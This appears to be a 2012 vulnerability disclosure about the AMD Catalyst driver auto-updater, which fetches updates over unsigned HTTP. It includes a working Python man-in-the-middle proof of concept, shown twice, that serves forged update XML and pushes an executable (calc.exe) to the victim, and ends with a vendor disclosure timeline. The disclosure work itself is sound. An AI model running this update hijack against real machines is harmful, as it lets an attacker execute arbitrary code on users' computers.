Description of vulnerability

The AMD Catalyst driver auto update feature enables users to automatically update the AMD Catalyst driver on their machine through a single click when the driver determines that it is out of date.

However a vulnerability exists in this mechanism as a result of:

The download URL and binary download is done over HTTP The binary is not verified as having been signed by AMD before execution

This means that a MITM can intercept the requests to the AMD support site and redirect the auto-update feature to download and execute a binary of the attacker’s choice without the user knowing any better when they decide to auto-update.

Proof of concept

import SimpleHTTPServer import SocketServer xml = """<?xml version="1.0" encoding="utf-8"?> <list> <Catalyst-Driver-Files> <Title>Catalyst Software Suite with .NET 4 Support</Title> <DriverCategory>Full Catalyst Software Suite (Recommended)</DriverCategory> <DriverLanguage>;#All;#</DriverLanguage> <DriverProductType>;#1-Radeon;#3-Integrated;#18-AIW_HD;#</DriverProductType> <FileSize>184 MB</FileSize> <OSType>;#Windows Vista - 64-Bit Edition;#Windows 7 - 64-Bit Edition;#</OSType> <ReleaseDate>2012-10-22T00:00:00-05:00</ReleaseDate> <RevisionNumber>12.42</RevisionNumber> <RollupSortOrder>15</RollupSortOrder> <TextMultiple1> </TextMultiple1> <TextSingle1>http://www2.ati.com/drivers/12-10_vista_win7_win8_64_dd_ccc_whql_net4.exe</TextSingle1> <TechDownloadGPUSubtype>Driver</TechDownloadGPUSubtype> <ContentType>GraphicsDriverFile</ContentType> <DriverVersionSupported>;#12.42;#</DriverVersionSupported> <ID>956</ID> <Modified>2012-10-22T21:30:52-05:00</Modified> <Created>2012-10-22T21:30:52-05:00</Created> <Author>System Account</Author> <Editor>System Account</Editor> <_UIVersionString>1.0</_UIVersionString> <Attachments>0</Attachments> <TitleCN>Catalyst Software Suite</TitleCN> <TitleBR>Catalyst Software Suite</TitleBR> <TitleDE>Catalyst Software Suite</TitleDE> <TitleFR>Catalyst Software Suite</TitleFR> <TitleIT>Catalyst Software Suite</TitleIT> <TitleLA>Catalyst Software Suite</TitleLA> <DescriptionCN> </DescriptionCN> <DescriptionBR> </DescriptionBR> <DescriptionDE> </DescriptionDE> <DescriptionFR> </DescriptionFR> <DescriptionIT> </DescriptionIT> <DescriptionLA> </DescriptionLA> <TitleKR>(Catalyst Software Suite)</TitleKR> <DescriptionKR> </DescriptionKR> <LinkTitleNoMenu>Catalyst Software Suite with .NET 4 Support</LinkTitleNoMenu> <LinkTitle>Catalyst Software Suite with .NET 4 Support</LinkTitle> </Catalyst-Driver-Files> </list> """ class ExploitHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): def do_GET(self): if "catalystxml" in self.path: self.send_response(200) self.send_header('Content-type','text/xml') self.end_headers() self.wfile.write(xml) return elif ".exe" in self.path: self.send_response(200) self.send_header('Content-type','application/octet-stream') self.end_headers() f = open(r"C:\Windows\System32\calc.exe", "rb") self.wfile.write(f.read()) f.close() return httpd = SocketServer.ThreadingTCPServer(('0.0.0.0', 80), ExploitHandler) httpd.serve_forever() 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 import SimpleHTTPServer import SocketServer xml = """ <? xml version = "1.0" encoding = "utf-8" ?> <list> <Catalyst-Driver-Files> <Title>Catalyst Software Suite with .NET 4 Support</Title> <DriverCategory>Full Catalyst Software Suite (Recommended)</DriverCategory> <DriverLanguage>;#All;#</DriverLanguage> <DriverProductType>;#1-Radeon;#3-Integrated;#18-AIW_HD;#</DriverProductType> <FileSize>184 MB</FileSize> <OSType>;#Windows Vista - 64-Bit Edition;#Windows 7 - 64-Bit Edition;#</OSType> <ReleaseDate>2012-10-22T00:00:00-05:00</ReleaseDate> <RevisionNumber>12.42</RevisionNumber> <RollupSortOrder>15</RollupSortOrder> <TextMultiple1> </TextMultiple1> <TextSingle1>http://www2.ati.com/drivers/12-10_vista_win7_win8_64_dd_ccc_whql_net4.exe</TextSingle1> <TechDownloadGPUSubtype>Driver</TechDownloadGPUSubtype> <ContentType>GraphicsDriverFile</ContentType> <DriverVersionSupported>;#12.42;#</DriverVersionSupported> <ID>956</ID> <Modified>2012-10-22T21:30:52-05:00</Modified> <Created>2012-10-22T21:30:52-05:00</Created> <Author>System Account</Author> <Editor>System Account</Editor> <_UIVersionString>1.0</_UIVersionString> <Attachments>0</Attachments> <TitleCN>Catalyst Software Suite</TitleCN> <TitleBR>Catalyst Software Suite</TitleBR> <TitleDE>Catalyst Software Suite</TitleDE> <TitleFR>Catalyst Software Suite</TitleFR> <TitleIT>Catalyst Software Suite</TitleIT> <TitleLA>Catalyst Software Suite</TitleLA> <DescriptionCN> </DescriptionCN> <DescriptionBR> </DescriptionBR> <DescriptionDE> </DescriptionDE> <DescriptionFR> </DescriptionFR> <DescriptionIT> </DescriptionIT> <DescriptionLA> </DescriptionLA> <TitleKR>(Catalyst Software Suite)</TitleKR> <DescriptionKR> </DescriptionKR> <LinkTitleNoMenu>Catalyst Software Suite with .NET 4 Support</LinkTitleNoMenu> <LinkTitle>Catalyst Software Suite with .NET 4 Support</LinkTitle> </Catalyst-Driver-Files> </list> """ class ExploitHandler ( SimpleHTTPServer . SimpleHTTPRequestHandler ) : def do_GET ( self ) : if "catalystxml" in self . path : self . send_response ( 200 ) self . send_header ( 'Content-type' , 'text/xml' ) self . end_headers ( ) self . wfile . write ( xml ) return elif ".exe" in self . path : self . send_response ( 200 ) self . send_header ( 'Content-type' , 'application/octet-stream' ) self . end_headers ( ) f = open ( r "C:\Windows\System32\calc.exe" , "rb" ) self . wfile . write ( f . read ( ) ) f . close ( ) return httpd = SocketServer . ThreadingTCPServer ( ( '0.0.0.0' , 80 ) , ExploitHandler ) httpd . serve_forever ( )

By pointing amd.com, www.amd.com, www.ati.com and www2.ati.com at this script, you’ll observe that the Catalyst update feature will prompt you to update the driver, and download and execute calc.exe.

Time table

23.11.2012 – Sent a request for security contact details

23.11.2012 – Vendor informs that they will only coordinate issues through their support ticket system

23.11.2012 – Sent details as per request including proof of concept

26.11.2012 – Vendor acknowledges receipt of details and request further contact details

29.11.2012 – Vendor confirms that the team is working with their web team to address the issue

10.12.2012 – Mail sent asking for a rough timeline

14.12.2012 – Vendor replies informing that the driver team is still working on the issue, and that their legal team is also involved

19.12.2012 – Vendor publishes advisory: http://support.amd.com/us/kbarticles/Pages/AMDauto-updatenotification.aspx

17.01.2013 – Vendor releases AMD Catalyst 13.1, removing the update feature